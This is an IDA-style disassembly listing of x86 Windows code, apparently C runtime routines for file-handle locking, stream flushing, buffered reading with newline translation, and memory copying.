jnb short loc_41AE95
mov eax, ebx
sar eax, 5
lea edi, ds:481600h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41AE95
push ebx
call sub_41F5BC
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41AE6D
push ebx
call sub_41AD93
pop ecx
mov [ebp+var_1C], eax
jmp short loc_41AE7C
; ---------------------------------------------------------------------------
loc_41AE6D: ; CODE XREF: sub_41AE16+49�j
call sub_41B9A5
mov dword ptr [eax], 9
or [ebp+var_1C], 0FFFFFFFFh
loc_41AE7C: ; CODE XREF: sub_41AE16+55�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41AE8D
mov eax, [ebp+var_1C]
jmp short loc_41AEAB
sub_41AE16 endp
; =============== S U B R O U T I N E =======================================
sub_41AE8A proc near ; DATA XREF: .text:stru_42C0B0�o
mov ebx, [ebp+8]
sub_41AE8A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41AE8D proc near ; CODE XREF: sub_41AE16+6A�p
push ebx
call sub_41F62F
pop ecx
retn
sub_41AE8D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41AE16
loc_41AE95: ; CODE XREF: sub_41AE16+15�j
; sub_41AE16+35�j
call sub_41B9A5
mov dword ptr [eax], 9
call sub_41B9AE
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_41AEAB: ; CODE XREF: sub_41AE16+72�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41AE16
; =============== S U B R O U T I N E =======================================
sub_41AEB1 proc near ; CODE XREF: sub_416E31+18�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz short loc_41AEDA
test al, 8
jz short loc_41AEDA
push dword ptr [esi+8]
call sub_416D07
and word ptr [esi+0Ch], 0FBF7h
xor eax, eax
pop ecx
mov [esi], eax
mov [esi+8], eax
mov [esi+4], eax
loc_41AEDA: ; CODE XREF: sub_41AEB1+A�j
; sub_41AEB1+E�j
pop esi
retn
sub_41AEB1 endp
; =============== S U B R O U T I N E =======================================
sub_41AEDC proc near ; CODE XREF: sub_416E31+10�p
; sub_418558+38�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
mov eax, [esi+0Ch]
mov ecx, eax
and cl, 3
xor ebx, ebx
cmp cl, 2
jnz short loc_41AF2B
test ax, 108h
jz short loc_41AF2B
mov eax, [esi+8]
push edi
mov edi, [esi]
sub edi, eax
test edi, edi
jle short loc_41AF2A
push edi
push eax
push dword ptr [esi+10h]
call sub_41E47E
add esp, 0Ch
cmp eax, edi
jnz short loc_41AF23
mov eax, [esi+0Ch]
test al, al
jns short loc_41AF2A
and eax, 0FFFFFFFDh
mov [esi+0Ch], eax
jmp short loc_41AF2A
; ---------------------------------------------------------------------------
loc_41AF23: ; CODE XREF: sub_41AEDC+36�j
or dword ptr [esi+0Ch], 20h
or ebx, 0FFFFFFFFh
loc_41AF2A: ; CODE XREF: sub_41AEDC+25�j
; sub_41AEDC+3D�j ...
pop edi
loc_41AF2B: ; CODE XREF: sub_41AEDC+13�j
; sub_41AEDC+19�j
mov eax, [esi+8]
and dword ptr [esi+4], 0
mov [esi], eax
pop esi
mov eax, ebx
pop ebx
retn
sub_41AEDC endp
; =============== S U B R O U T I N E =======================================
sub_41AF39 proc near ; CODE XREF: sub_41AF67+67�p
; sub_41AF67+82�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_41AEDC
test eax, eax
pop ecx
jz short loc_41AF4E
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41AF4E: ; CODE XREF: sub_41AF39+E�j
test byte ptr [esi+0Dh], 40h
jz short loc_41AF63
push dword ptr [esi+10h]
call sub_41F79E
pop ecx
neg eax
sbb eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_41AF63: ; CODE XREF: sub_41AF39+19�j
xor eax, eax
pop esi
retn
sub_41AF39 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AF67 proc near ; CODE XREF: sub_41B03C+2�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0041B018 SIZE 0000001B BYTES
push 14h
push offset stru_42C0C0
call __SEH_prolog
xor edi, edi
mov [ebp+var_1C], edi
mov [ebp+var_20], edi
push 1
call sub_41A1D6
pop ecx
mov [ebp+ms_exc.disabled], edi
xor esi, esi
loc_41AF88: ; CODE XREF: sub_41AF67+99�j
mov [ebp+var_24], esi
cmp esi, dword_482960
jge loc_41B018
mov eax, dword_481940
mov eax, [eax+esi*4]
cmp eax, edi
jz short loc_41AFFF
test byte ptr [eax+0Ch], 83h
jz short loc_41AFFF
push eax
push esi
call sub_41B131
pop ecx
pop ecx
xor edx, edx
inc edx
mov [ebp+ms_exc.disabled], edx
mov eax, dword_481940
mov eax, [eax+esi*4]
mov ecx, [eax+0Ch]
test cl, 83h
jz short loc_41AFF7
cmp [ebp+arg_0], edx
jnz short loc_41AFDE
push eax
call sub_41AF39
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_41AFF7
inc [ebp+var_1C]
jmp short loc_41AFF7
; ---------------------------------------------------------------------------
loc_41AFDE: ; CODE XREF: sub_41AF67+64�j
cmp [ebp+arg_0], edi
jnz short loc_41AFF7
test cl, 2
jz short loc_41AFF7
push eax
call sub_41AF39
pop ecx
cmp eax, 0FFFFFFFFh
jnz short loc_41AFF7
or [ebp+var_20], eax
loc_41AFF7: ; CODE XREF: sub_41AF67+5F�j
; sub_41AF67+70�j ...
mov [ebp+ms_exc.disabled], edi
call sub_41B007
loc_41AFFF: ; CODE XREF: sub_41AF67+3A�j
; sub_41AF67+40�j
inc esi
jmp short loc_41AF88
sub_41AF67 endp
; =============== S U B R O U T I N E =======================================
sub_41B002 proc near ; DATA XREF: .text:0042C0D4�o
xor edi, edi
mov esi, [ebp-24h]
sub_41B002 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41B007 proc near ; CODE XREF: sub_41AF67+93�p
mov eax, dword_481940
push dword ptr [eax+esi*4]
push esi
call sub_41B183
pop ecx
pop ecx
retn
sub_41B007 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41AF67
loc_41B018: ; CODE XREF: sub_41AF67+2A�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41B033
cmp [ebp+arg_0], 1
mov eax, [ebp+var_1C]
jz short loc_41B02D
mov eax, [ebp+var_20]
loc_41B02D: ; CODE XREF: sub_41AF67+C1�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41AF67
; =============== S U B R O U T I N E =======================================
sub_41B033 proc near ; CODE XREF: sub_41AF67+B5�p
; DATA XREF: .text:stru_42C0C0�o
push 1
call sub_41A142
pop ecx
retn
sub_41B033 endp
; =============== S U B R O U T I N E =======================================
sub_41B03C proc near ; CODE XREF: sub_41B0EE�p
push 1
call sub_41AF67
pop ecx
retn
sub_41B03C endp
; =============== S U B R O U T I N E =======================================
sub_41B045 proc near ; DATA XREF: .text:0042E010�o
mov eax, dword_482960
test eax, eax
push esi
push 14h
pop esi
jnz short loc_41B059
mov eax, 200h
jmp short loc_41B05F
; ---------------------------------------------------------------------------
loc_41B059: ; CODE XREF: sub_41B045+B�j
cmp eax, esi
jge short loc_41B064
mov eax, esi
loc_41B05F: ; CODE XREF: sub_41B045+12�j
mov dword_482960, eax
loc_41B064: ; CODE XREF: sub_41B045+16�j
push 4
push eax
call sub_41E61E
test eax, eax
pop ecx
pop ecx
mov dword_481940, eax
jnz short loc_41B095
push 4
push esi
mov dword_482960, esi
call sub_41E61E
test eax, eax
pop ecx
pop ecx
mov dword_481940, eax
jnz short loc_41B095
push 1Ah
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_41B095: ; CODE XREF: sub_41B045+30�j
; sub_41B045+49�j
xor edx, edx
mov ecx, offset off_432658
jmp short loc_41B0A3
; ---------------------------------------------------------------------------
loc_41B09E: ; CODE XREF: sub_41B045+6D�j
mov eax, dword_481940
loc_41B0A3: ; CODE XREF: sub_41B045+57�j
mov [edx+eax], ecx
add ecx, 20h
add edx, 4
cmp ecx, offset dword_4328D8
jl short loc_41B09E
xor ecx, ecx
mov edx, offset dword_432668
loc_41B0BB: ; CODE XREF: sub_41B045+A3�j
mov esi, ecx
mov eax, ecx
and eax, 1Fh
sar esi, 5
mov esi, dword_481600[esi*4]
lea eax, [eax+eax*8]
mov eax, [esi+eax*4]
cmp eax, 0FFFFFFFFh
jz short loc_41B0DB
test eax, eax
jnz short loc_41B0DE
loc_41B0DB: ; CODE XREF: sub_41B045+90�j
or dword ptr [edx], 0FFFFFFFFh
loc_41B0DE: ; CODE XREF: sub_41B045+94�j
add edx, 20h
inc ecx
cmp edx, offset dword_4326C8
jl short loc_41B0BB
xor eax, eax
pop esi
retn
sub_41B045 endp
; =============== S U B R O U T I N E =======================================
sub_41B0EE proc near ; DATA XREF: .text:0042E028�o
; FUNCTION CHUNK AT 0041F85A SIZE 00000092 BYTES
call sub_41B03C
cmp byte_4811BC, 0
jz short locret_41B101
jmp loc_41F85A
; ---------------------------------------------------------------------------
locret_41B101: ; CODE XREF: sub_41B0EE+C�j
retn
sub_41B0EE endp
; =============== S U B R O U T I N E =======================================
sub_41B102 proc near ; CODE XREF: sub_416E7D+27�p
; sub_416FB7+F�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_432658
cmp eax, ecx
jb short loc_41B126
cmp eax, offset dword_4328B8
ja short loc_41B126
sub eax, ecx
sar eax, 5
add eax, 10h
push eax
call sub_41A1D6
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41B126: ; CODE XREF: sub_41B102+B�j
; sub_41B102+12�j
add eax, 20h
push eax
call dword_42201C ; RtlEnterCriticalSection
retn
sub_41B102 endp
; =============== S U B R O U T I N E =======================================
sub_41B131 proc near ; CODE XREF: sub_41AF67+44�p
; sub_41BA2A+66�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_41B145
add eax, 10h
push eax
call sub_41A1D6
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41B145: ; CODE XREF: sub_41B131+7�j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call dword_42201C ; RtlEnterCriticalSection
retn
sub_41B131 endp
; =============== S U B R O U T I N E =======================================
sub_41B154 proc near ; CODE XREF: sub_416EC6+1�p
; sub_416FF9+3�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_432658
cmp eax, ecx
jb short loc_41B178
cmp eax, offset dword_4328B8
ja short loc_41B178
sub eax, ecx
sar eax, 5
add eax, 10h
push eax
call sub_41A142
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41B178: ; CODE XREF: sub_41B154+B�j
; sub_41B154+12�j
add eax, 20h
push eax
call dword_422018 ; RtlLeaveCriticalSection
retn
sub_41B154 endp
; =============== S U B R O U T I N E =======================================
sub_41B183 proc near ; CODE XREF: sub_41B007+9�p
; sub_41BA2A+7D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_41B197
add eax, 10h
push eax
call sub_41A142
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41B197: ; CODE XREF: sub_41B183+7�j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call dword_422018 ; RtlLeaveCriticalSection
retn
sub_41B183 endp
; =============== S U B R O U T I N E =======================================
sub_41B1A6 proc near ; CODE XREF: sub_416ECE+AA�p
; sub_4181E7+44�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz loc_41B282
test al, 40h
jnz loc_41B282
test al, 2
jz short loc_41B1CD
or eax, 20h
mov [esi+0Ch], eax
jmp loc_41B282
; ---------------------------------------------------------------------------
loc_41B1CD: ; CODE XREF: sub_41B1A6+1A�j
or eax, 1
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_41B1E2
push esi
call sub_41E529
pop ecx
jmp short loc_41B1E7
; ---------------------------------------------------------------------------
loc_41B1E2: ; CODE XREF: sub_41B1A6+31�j
mov eax, [esi+8]
mov [esi], eax
loc_41B1E7: ; CODE XREF: sub_41B1A6+3A�j
push dword ptr [esi+18h]
push dword ptr [esi+8]
push dword ptr [esi+10h]
call sub_41B454
add esp, 0Ch
test eax, eax
mov [esi+4], eax
jz short loc_41B271
cmp eax, 0FFFFFFFFh
jz short loc_41B271
mov edx, [esi+0Ch]
test dl, 82h
jnz short loc_41B246
mov ecx, [esi+10h]
cmp ecx, 0FFFFFFFFh
push edi
jz short loc_41B22C
mov edi, ecx
sar edi, 5
mov edi, dword_481600[edi*4]
and ecx, 1Fh
lea ecx, [ecx+ecx*8]
lea edi, [edi+ecx*4]
jmp short loc_41B231
; ---------------------------------------------------------------------------
loc_41B22C: ; CODE XREF: sub_41B1A6+6D�j
mov edi, offset dword_432C90
loc_41B231: ; CODE XREF: sub_41B1A6+84�j
mov cl, [edi+4]
and cl, 82h
cmp cl, 82h
pop edi
jnz short loc_41B246
or edx, 2000h
mov [esi+0Ch], edx
loc_41B246: ; CODE XREF: sub_41B1A6+64�j
; sub_41B1A6+95�j
cmp dword ptr [esi+18h], 200h
jnz short loc_41B263
mov ecx, [esi+0Ch]
test cl, 8
jz short loc_41B263
test ch, 4
jnz short loc_41B263
mov dword ptr [esi+18h], 1000h
loc_41B263: ; CODE XREF: sub_41B1A6+A7�j
; sub_41B1A6+AF�j ...
mov ecx, [esi]
dec eax
mov [esi+4], eax
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41B271: ; CODE XREF: sub_41B1A6+57�j
; sub_41B1A6+5C�j
neg eax
sbb eax, eax
and eax, 10h
add eax, 10h
or [esi+0Ch], eax
and dword ptr [esi+4], 0
loc_41B282: ; CODE XREF: sub_41B1A6+A�j
; sub_41B1A6+12�j ...
or eax, 0FFFFFFFFh
pop esi
retn
sub_41B1A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B287 proc near ; CODE XREF: sub_41B454+52�p
; sub_41F8F5+2A7�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
and [ebp+var_8], 0
cmp [ebp+arg_8], 0
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
mov edx, ebx
jz loc_41B44D
mov eax, [ebp+arg_0]
mov ecx, eax
and eax, 1Fh
sar ecx, 5
lea esi, [eax+eax*8]
lea edi, ds:481600h[ecx*4]
mov eax, [edi]
shl esi, 2
add eax, esi
mov cl, [eax+4]
test cl, 2
jnz loc_41B44D
test cl, 48h
jz short loc_41B2ED
mov al, [eax+5]
cmp al, 0Ah
jz short loc_41B2ED
dec [ebp+arg_8]
mov [ebx], al
mov eax, [edi]
lea edx, [ebx+1]
mov [ebp+var_8], 1
mov byte ptr [eax+esi+5], 0Ah
loc_41B2ED: ; CODE XREF: sub_41B287+47�j
; sub_41B287+4E�j
push 0
lea eax, [ebp+var_C]
push eax
push [ebp+arg_8]
mov eax, [edi]
push edx
push dword ptr [eax+esi]
call dword_42208C ; ReadFile
test eax, eax
jnz short loc_41B33F
call dword_422008 ; RtlGetLastWin32Error
push 5
pop esi
cmp eax, esi
jnz short loc_41B327
call sub_41B9A5
mov dword ptr [eax], 9
call sub_41B9AE
mov [eax], esi
jmp short loc_41B337
; ---------------------------------------------------------------------------
loc_41B327: ; CODE XREF: sub_41B287+8A�j
cmp eax, 6Dh
jz loc_41B44D
push eax
call sub_41B9B7
pop ecx
loc_41B337: ; CODE XREF: sub_41B287+9E�j
or eax, 0FFFFFFFFh
jmp loc_41B44F
; ---------------------------------------------------------------------------
loc_41B33F: ; CODE XREF: sub_41B287+7D�j
mov eax, [edi]
mov edx, [ebp+var_C]
add [ebp+var_8], edx
lea ecx, [eax+esi+4]
mov al, [ecx]
test al, al
jns loc_41B448
test edx, edx
jz short loc_41B362
cmp byte ptr [ebx], 0Ah
jnz short loc_41B362
or al, 4
jmp short loc_41B364
; ---------------------------------------------------------------------------
loc_41B362: ; CODE XREF: sub_41B287+D0�j
; sub_41B287+D5�j
and al, 0FBh
loc_41B364: ; CODE XREF: sub_41B287+D9�j
mov [ecx], al
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_8]
add ecx, eax
cmp eax, ecx
mov [ebp+arg_8], eax
mov [ebp+var_8], ecx
jnb loc_41B442
loc_41B37C: ; CODE XREF: sub_41B287+1A3�j
mov eax, [ebp+arg_8]
mov al, [eax]
cmp al, 1Ah
jz loc_41B432
cmp al, 0Dh
jz short loc_41B398
mov [ebx], al
inc ebx
inc [ebp+arg_8]
jmp loc_41B424
; ---------------------------------------------------------------------------
loc_41B398: ; CODE XREF: sub_41B287+104�j
dec ecx
cmp [ebp+arg_8], ecx
jnb short loc_41B3B2
mov eax, [ebp+arg_8]
inc eax
cmp byte ptr [eax], 0Ah
jnz short loc_41B3AD
add [ebp+arg_8], 2
jmp short loc_41B406
; ---------------------------------------------------------------------------
loc_41B3AD: ; CODE XREF: sub_41B287+11E�j
mov [ebp+arg_8], eax
jmp short loc_41B420
; ---------------------------------------------------------------------------
loc_41B3B2: ; CODE XREF: sub_41B287+115�j
inc [ebp+arg_8]
push 0
lea eax, [ebp+var_C]
push eax
push 1
lea eax, [ebp+var_1]
push eax
mov eax, [edi]
push dword ptr [eax+esi]
call dword_42208C ; ReadFile
test eax, eax
jnz short loc_41B3DA
call dword_422008 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_41B420
loc_41B3DA: ; CODE XREF: sub_41B287+147�j
cmp [ebp+var_C], 0
jz short loc_41B420
mov eax, [edi]
test byte ptr [eax+esi+4], 48h
jz short loc_41B3FB
mov al, [ebp+var_1]
cmp al, 0Ah
jz short loc_41B406
mov byte ptr [ebx], 0Dh
mov ecx, [edi]
mov [ecx+esi+5], al
jmp short loc_41B423
; ---------------------------------------------------------------------------
loc_41B3FB: ; CODE XREF: sub_41B287+160�j
cmp ebx, [ebp+arg_4]
jnz short loc_41B40B
cmp [ebp+var_1], 0Ah
jnz short loc_41B40B
loc_41B406: ; CODE XREF: sub_41B287+124�j
; sub_41B287+167�j
mov byte ptr [ebx], 0Ah
jmp short loc_41B423
; ---------------------------------------------------------------------------
loc_41B40B: ; CODE XREF: sub_41B287+177�j
; sub_41B287+17D�j
push 1
push 0FFFFFFFFh
push [ebp+arg_0]
call sub_41D6E6
add esp, 0Ch
cmp [ebp+var_1], 0Ah
jz short loc_41B424
loc_41B420: ; CODE XREF: sub_41B287+129�j
; sub_41B287+151�j ...
mov byte ptr [ebx], 0Dh
loc_41B423: ; CODE XREF: sub_41B287+172�j
; sub_41B287+182�j
inc ebx
loc_41B424: ; CODE XREF: sub_41B287+10C�j
; sub_41B287+197�j
mov ecx, [ebp+var_8]
cmp [ebp+arg_8], ecx
jb loc_41B37C
jmp short loc_41B442
; ---------------------------------------------------------------------------
loc_41B432: ; CODE XREF: sub_41B287+FC�j
mov eax, [edi]
lea esi, [eax+esi+4]
mov al, [esi]
test al, 40h
jnz short loc_41B442
or al, 2
mov [esi], al
loc_41B442: ; CODE XREF: sub_41B287+EF�j
; sub_41B287+1A9�j ...
sub ebx, [ebp+arg_4]
mov [ebp+var_8], ebx
loc_41B448: ; CODE XREF: sub_41B287+C8�j
mov eax, [ebp+var_8]
jmp short loc_41B44F
; ---------------------------------------------------------------------------
loc_41B44D: ; CODE XREF: sub_41B287+16�j
; sub_41B287+3E�j ...
xor eax, eax
loc_41B44F: ; CODE XREF: sub_41B287+B3�j
; sub_41B287+1C4�j
pop edi
pop esi
pop ebx
leave
retn
sub_41B287 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B454 proc near ; CODE XREF: sub_416ECE+91�p
; sub_41B1A6+4A�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0041B4E3 SIZE 0000001C BYTES
push 0Ch
push offset stru_42C0D8
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, dword_4815F0
jnb short loc_41B4E3
mov eax, ebx
sar eax, 5
lea edi, ds:481600h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41B4E3
push ebx
call sub_41F5BC
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41B4B3
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_41B287
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_41B4CA
; ---------------------------------------------------------------------------
loc_41B4B3: ; CODE XREF: sub_41B454+49�j
call sub_41B9A5
mov dword ptr [eax], 9
call sub_41B9AE
and dword ptr [eax], 0
or [ebp+var_1C], 0FFFFFFFFh
loc_41B4CA: ; CODE XREF: sub_41B454+5D�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41B4DB
mov eax, [ebp+var_1C]
jmp short loc_41B4F9
sub_41B454 endp
; =============== S U B R O U T I N E =======================================
sub_41B4D8 proc near ; DATA XREF: .text:stru_42C0D8�o
mov ebx, [ebp+8]
sub_41B4D8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41B4DB proc near ; CODE XREF: sub_41B454+7A�p
push ebx
call sub_41F62F
pop ecx
retn
sub_41B4DB endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41B454
loc_41B4E3: ; CODE XREF: sub_41B454+15�j
; sub_41B454+35�j
call sub_41B9A5
mov dword ptr [eax], 9
call sub_41B9AE
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_41B4F9: ; CODE XREF: sub_41B454+82�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41B454
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B500 proc near ; CODE XREF: sub_416ECE+5F�p
; sub_417003+A8�p ...
var_2EDCFFBF = byte ptr -2EDCFFBFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_41B520
cmp edi, eax
jb loc_41B69C
loc_41B520: ; CODE XREF: sub_41B500+16�j
test edi, 3
jnz short loc_41B53C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41B55C
rep movsd
jmp off_41B64C[edx*4]
; ---------------------------------------------------------------------------
loc_41B53C: ; CODE XREF: sub_41B500+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_41B554
and eax, 3
add ecx, eax
jmp dword ptr loc_41B55C+4[eax*4]
; ---------------------------------------------------------------------------
loc_41B554: ; CODE XREF: sub_41B500+46�j
jmp dword ptr loc_41B65C[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41B55C: ; CODE XREF: sub_41B500+31�j
; sub_41B500+8E�j ...
jmp off_41B5E0[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_41B56C+4
dd offset loc_41B59C
; ---------------------------------------------------------------------------
loc_41B56C: ; DATA XREF: sub_41B500+64�o
sal [ebp+var_2EDCFFBF], 8Ah
push es
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_41B55C
rep movsd
jmp off_41B64C[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41B59C: ; DATA XREF: sub_41B500+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_41B55C
rep movsd
jmp off_41B64C[edx*4]
; ---------------------------------------------------------------------------
align 10h
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_41B55C
rep movsd
jmp off_41B64C[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_41B5E0 dd offset loc_41B643 ; DATA XREF: sub_41B500:loc_41B55C�r
dd offset loc_41B630
dd offset loc_41B628
dd offset loc_41B620
dd offset loc_41B618
dd offset loc_41B610
dd offset loc_41B608
dd offset loc_41B600
; ---------------------------------------------------------------------------
loc_41B600: ; CODE XREF: sub_41B500:loc_41B55C�j
; DATA XREF: sub_41B500+FC�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_41B608: ; CODE XREF: sub_41B500:loc_41B55C�j
; DATA XREF: sub_41B500+F8�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_41B610: ; CODE XREF: sub_41B500:loc_41B55C�j
; DATA XREF: sub_41B500+F4�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_41B618: ; CODE XREF: sub_41B500:loc_41B55C�j
; DATA XREF: sub_41B500+F0�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_41B620: ; CODE XREF: sub_41B500:loc_41B55C�j
; DATA XREF: sub_41B500+EC�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_41B628: ; CODE XREF: sub_41B500:loc_41B55C�j
; DATA XREF: sub_41B500+E8�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_41B630: ; CODE XREF: sub_41B500:loc_41B55C�j
; DATA XREF: sub_41B500+E4�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41B643: ; CODE XREF: sub_41B500:loc_41B55C�j
; DATA XREF: sub_41B500:off_41B5E0�o
jmp off_41B64C[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41B64C dd offset loc_41B65C ; DATA XREF: sub_41B500+35�r
; sub_41B500+92�r ...
dd offset loc_41B664
dd offset loc_41B670
dd offset loc_41B684
; ---------------------------------------------------------------------------
loc_41B65C: ; CODE XREF: sub_41B500+35�j
; sub_41B500+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41B664: ; CODE XREF: sub_41B500+35�j
; sub_41B500+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41B670: ; CODE XREF: sub_41B500+35�j
; sub_41B500+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41B684: ; CODE XREF: sub_41B500+35�j
; sub_41B500+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41B69C: ; CODE XREF: sub_41B500+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_41B6D0
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41B6C4
std
rep movsd
cld
jmp off_41B7E8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41B6C4: ; CODE XREF: sub_41B500+1B5�j
; sub_41B500+210�j ...
neg ecx
jmp off_41B798[ecx*4]
; ---------------------------------------------------------------------------
align 10h
loc_41B6D0: ; CODE XREF: sub_41B500+1AA�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_41B6E8
and eax, 3
sub ecx, eax
jmp dword ptr loc_41B6E8+4[eax*4]
; ---------------------------------------------------------------------------
loc_41B6E8: ; CODE XREF: sub_41B500+1DA�j
; DATA XREF: sub_41B500+1E1�r
jmp off_41B7E8[ecx*4]
; ---------------------------------------------------------------------------
align 10h
cld
mov dh, 41h
add [eax], ah
mov bh, 41h
add [eax-49h], cl
inc ecx
add [edx-2EDCFCBAh], cl
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_41B6C4
std
rep movsd
cld
jmp off_41B7E8[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_41B6C4
std
rep movsd
cld
jmp off_41B7E8[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_41B6C4
